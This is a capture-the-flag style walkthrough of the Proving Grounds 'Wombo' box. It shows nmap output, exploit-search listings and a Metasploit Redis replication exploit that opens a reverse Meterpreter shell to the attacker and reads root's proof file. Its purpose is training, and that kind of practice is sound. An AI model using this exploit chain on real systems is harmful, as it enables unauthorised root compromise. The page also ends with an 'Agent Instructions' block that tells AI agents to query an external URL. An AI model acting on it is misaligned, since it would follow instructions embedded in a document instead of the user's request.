# Wombo

## Intro

```
# Nmap 7.94SVN scan initiated Fri Mar 29 09:30:46 2024 as: nmap -sC -sV -vv -oA nmap/initial wombo.pg
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.1 \d\d\d (?:[^\r\n]*\r\n(?!\r\n))*?.*\r\nServer: Virata-EmWeb/R([\d_]+)\r\nContent-Type: text/html; ?charset=UTF-8\r\nExpires: .*<title>HP (Color |)LaserJet ([\w._ -]+)&nbsp;&nbsp;&nbsp;'
Nmap scan report for wombo.pg (192.168.172.69)
Host is up, received echo-reply ttl 61 (0.042s latency).
Scanned at 2024-03-29 09:30:47 CDT for 24s
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE  SERVICE    REASON         VERSION
22/tcp   open   ssh        syn-ack ttl 61 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 09:80:39:ef:3f:61:a8:d9:e6:fb:04:94:23:c9:ef:a8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGBXRhQCez7/IOdnHzLYdpVtWWRMN/7bUR/C3T/W6V9DwlKUS2AfdncLdLwqnx61jODFdXDrTdEdTAtK4MHuXt/UOLDXr1SOfUHYQbZd1rmpMaeB3qOKfoVP7NMp2Ga68kT/9NvBphakYXRWw4C7RS0N+4YWU/BjSyMTIdnhJX05lC5Uyljg7FliJ7d3J/CtF98I6Oo5u/Eb2/5BB45/1IuM6R7BGCDOpIs6po1FyEk8gFktbB+INGATdBPxvmAOX6G7m/R491a9/QtaF8wrgsjS3fQftoiW8vwcaom8Bmu94xZ9pZq0Dgt9VWQz241T5dGQrp57s6Djl/V83/qGFP
|   256 83:f8:6f:50:7a:62:05:aa:15:44:10:f5:4a:c2:f5:a6 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLg0oQ1t4NCz+KWPtrCjgDf+qjW2Vb4oOc/eM21vT9rIPJa//rO0LFT8czDxcWFU9HMSEohfSm8emC4lShgGrY4=
|   256 1e:2b:13:30:5c:f1:31:15:b4:e8:f3:d2:c4:e8:05:b5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPS81xs7EU6k92rNFdmsDF7qcRDxDILJUeva18aKW1GV
53/tcp   closed domain     reset ttl 61
80/tcp   open   http       syn-ack ttl 61 nginx 1.10.3
|_http-title: Welcome to nginx!
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.3
8080/tcp open   http-proxy syn-ack ttl 61
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home | NodeBB
|_http-favicon: Unknown favicon MD5: 152FF7D5AE5BDB84B33D4DCA31EB7CD3
| http-robots.txt: 3 disallowed entries 
|_/admin/ /reset/ /compose
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     X-DNS-Prefetch-Control: off
|     X-Frame-Options: SAMEORIGIN
|     X-Download-Options: noopen
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Referrer-Policy: strict-origin-when-cross-origin
|     X-Powered-By: NodeBB
|     set-cookie: _csrf=FrVAVZmax3Bh4eITxK1YpdTU; Path=/
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 11098
|     ETag: W/"2b5a-d4cpxIx7F4gKsmtHDO3klQzqrG0"
|     Vary: Accept-Encoding
|     Date: Fri, 29 Mar 2024 14:30:59 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en-GB" data-dir="ltr" style="direction: ltr;" >
|     <head>
|     <title>Not Found | NodeBB</title>
|     <meta name="viewport" content="width&#x3D;device-width, initial-scale&#x3D;1.0" />
|     <meta name="content-type" content="text/html; charset=UTF-8" />
|     <meta name="apple-mobile-web-app-capable" content="yes" />
|     <meta name="mobile-web-app-capable" content="yes" />
|     <meta property="og:site_n
|   GetRequest: 
|     HTTP/1.1 200 OK
|     X-DNS-Prefetch-Control: off
|     X-Frame-Options: SAMEORIGIN
|     X-Download-Options: noopen
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Referrer-Policy: strict-origin-when-cross-origin
|     X-Powered-By: NodeBB
|     set-cookie: _csrf=e_Gw9hiHeqzrq47l7lnpZMxh; Path=/
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 18181
|     ETag: W/"4705-Whn/BeeEWdcGXAmiDfsThfeSkvw"
|     Vary: Accept-Encoding
|     Date: Fri, 29 Mar 2024 14:30:58 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en-GB" data-dir="ltr" style="direction: ltr;" >
|     <head>
|     <title>Home | NodeBB</title>
|     <meta name="viewport" content="width&#x3D;device-width, initial-scale&#x3D;1.0" />
|     <meta name="content-type" content="text/html; charset=UTF-8" />
|     <meta name="apple-mobile-web-app-capable" content="yes" />
|     <meta name="mobile-web-app-capable" content="yes" />
|     <meta property="og:site_name" content
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     X-DNS-Prefetch-Control: off
|     X-Frame-Options: SAMEORIGIN
|     X-Download-Options: noopen
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Referrer-Policy: strict-origin-when-cross-origin
|     X-Powered-By: NodeBB
|     Allow: GET,HEAD
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 8
|     ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
|     Vary: Accept-Encoding
|     Date: Fri, 29 Mar 2024 14:30:58 GMT
|     Connection: close
|     GET,HEAD
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=3/29%Time=6606D0A2%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,34B2,"HTTP/1\.1\x20200\x20OK\r\nX-DNS-Prefetch-Control:\x20
SF:off\r\nX-Frame-Options:\x20SAMEORIGIN\r\nX-Download-Options:\x20noopen\
SF:r\nX-Content-Type-Options:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mod
SF:e=block\r\nReferrer-Policy:\x20strict-origin-when-cross-origin\r\nX-Pow
SF:ered-By:\x20NodeBB\r\nset-cookie:\x20_csrf=e_Gw9hiHeqzrq47l7lnpZMxh;\x2
SF:0Path=/\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Leng
SF:th:\x2018181\r\nETag:\x20W/\"4705-Whn/BeeEWdcGXAmiDfsThfeSkvw\"\r\nVary
SF::\x20Accept-Encoding\r\nDate:\x20Fri,\x2029\x20Mar\x202024\x2014:30:58\
SF:x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\r\n<html\x20la
SF:ng=\"en-GB\"\x20data-dir=\"ltr\"\x20style=\"direction:\x20ltr;\"\x20\x2
SF:0>\r\n<head>\r\n\t<title>Home\x20\|\x20NodeBB</title>\r\n\t<meta\x20nam
SF:e=\"viewport\"\x20content=\"width&#x3D;device-width,\x20initial-scale&#
SF:x3D;1\.0\"\x20/>\n\t<meta\x20name=\"content-type\"\x20content=\"text/ht
SF:ml;\x20charset=UTF-8\"\x20/>\n\t<meta\x20name=\"apple-mobile-web-app-ca
SF:pable\"\x20content=\"yes\"\x20/>\n\t<meta\x20name=\"mobile-web-app-capa
SF:ble\"\x20content=\"yes\"\x20/>\n\t<meta\x20property=\"og:site_name\"\x2
SF:0content")%r(HTTPOptions,1BF,"HTTP/1\.1\x20200\x20OK\r\nX-DNS-Prefetch-
SF:Control:\x20off\r\nX-Frame-Options:\x20SAMEORIGIN\r\nX-Download-Options
SF::\x20noopen\r\nX-Content-Type-Options:\x20nosniff\r\nX-XSS-Protection:\
SF:x201;\x20mode=block\r\nReferrer-Policy:\x20strict-origin-when-cross-ori
SF:gin\r\nX-Powered-By:\x20NodeBB\r\nAllow:\x20GET,HEAD\r\nContent-Type:\x
SF:20text/html;\x20charset=utf-8\r\nContent-Length:\x208\r\nETag:\x20W/\"8
SF:-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg\"\r\nVary:\x20Accept-Encoding\r\nDate:\x20
SF:Fri,\x2029\x20Mar\x202024\x2014:30:58\x20GMT\r\nConnection:\x20close\r\
SF:n\r\nGET,HEAD")%r(RTSPRequest,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\
SF:nConnection:\x20close\r\n\r\n")%r(FourOhFourRequest,1514,"HTTP/1\.1\x20
SF:404\x20Not\x20Found\r\nX-DNS-Prefetch-Control:\x20off\r\nX-Frame-Option
SF:s:\x20SAMEORIGIN\r\nX-Download-Options:\x20noopen\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nReferrer-P
SF:olicy:\x20strict-origin-when-cross-origin\r\nX-Powered-By:\x20NodeBB\r\
SF:nset-cookie:\x20_csrf=FrVAVZmax3Bh4eITxK1YpdTU;\x20Path=/\r\nContent-Ty
SF:pe:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x2011098\r\nETag:
SF:\x20W/\"2b5a-d4cpxIx7F4gKsmtHDO3klQzqrG0\"\r\nVary:\x20Accept-Encoding\
SF:r\nDate:\x20Fri,\x2029\x20Mar\x202024\x2014:30:59\x20GMT\r\nConnection:
SF:\x20close\r\n\r\n<!DOCTYPE\x20html>\r\n<html\x20lang=\"en-GB\"\x20data-
SF:dir=\"ltr\"\x20style=\"direction:\x20ltr;\"\x20\x20>\r\n<head>\r\n\t<ti
SF:tle>Not\x20Found\x20\|\x20NodeBB</title>\r\n\t<meta\x20name=\"viewport\
SF:"\x20content=\"width&#x3D;device-width,\x20initial-scale&#x3D;1\.0\"\x2
SF:0/>\n\t<meta\x20name=\"content-type\"\x20content=\"text/html;\x20charse
SF:t=UTF-8\"\x20/>\n\t<meta\x20name=\"apple-mobile-web-app-capable\"\x20co
SF:ntent=\"yes\"\x20/>\n\t<meta\x20name=\"mobile-web-app-capable\"\x20cont
SF:ent=\"yes\"\x20/>\n\t<meta\x20property=\"og:site_n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 29 09:31:11 2024 -- 1 IP address (1 host up) scanned in 24.15 seconds

```

Open Ports

* 22/tcp - OpenSSH 7.4p1 Debian
* 80/tcp - nginx 1.10.3
* 6379/tcp - Redis key-value store 5.0.9
* 8080/tcp - unknown http server
* 27017/tcp - Mongo DB?&#x20;

OpenSSH exploits

```
---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Debian OpenSSH - (Authenticated) Remote SELinux Privilege Escalation                                            | linux/remote/6094.txt
OpenSSH < 7.7 - User Enumeration (2)                                                                            | linux/remote/45939.py

```

Additional NMAP results

```
6379/tcp  open   redis      syn-ack ttl 61 Redis key-value store 5.0.9                                                                            
8080/tcp  open   http-proxy syn-ack ttl 61                                                                                                        
27017/tcp open   mongod?    syn-ack ttl 61                             
```

Redis exploits

```
---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Redis - Replication Code Execution (Metasploit)                                                                 | linux/remote/48272.rb
Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)                                                   | linux/remote/47195.rb
Redis 5.0 - Denial of Service                                                                                   | linux/dos/44908.txt
Redis-cli < 5.0 - Buffer Overflow (PoC)                                                                         | linux/local/44904.py
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

```

## Initial Foothold

```
msf6 exploit(linux/redis/redis_replication_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.45.197:80 
[*] 192.168.172.69:6379   - Compile redis module extension file
[+] 192.168.172.69:6379   - Payload generated successfully! 
[*] 192.168.172.69:6379   - Listening on 192.168.45.197:6379
[*] 192.168.172.69:6379   - Rogue server close...
[*] 192.168.172.69:6379   - Sending command to trigger payload.
[*] Sending stage (3045380 bytes) to 192.168.172.69
[*] Meterpreter session 1 opened (192.168.45.197:80 -> 192.168.172.69:41234) at 2024-03-29 10:10:52 -0500
[!] 192.168.172.69:6379   - This exploit may require manual cleanup of './hcwoot.so' on the target

meterpreter > getuid
Server username: root
meterpreter > shell
Process 1121 created.
Channel 1 created.
whoami
root
cat /root/proof.txt
bdca7f701911d77776b59652397c383b
```

## Privilege Escalation

No escalation required


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://walkthroughs.cyanidesecurity.com/proving-grounds/wombo.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.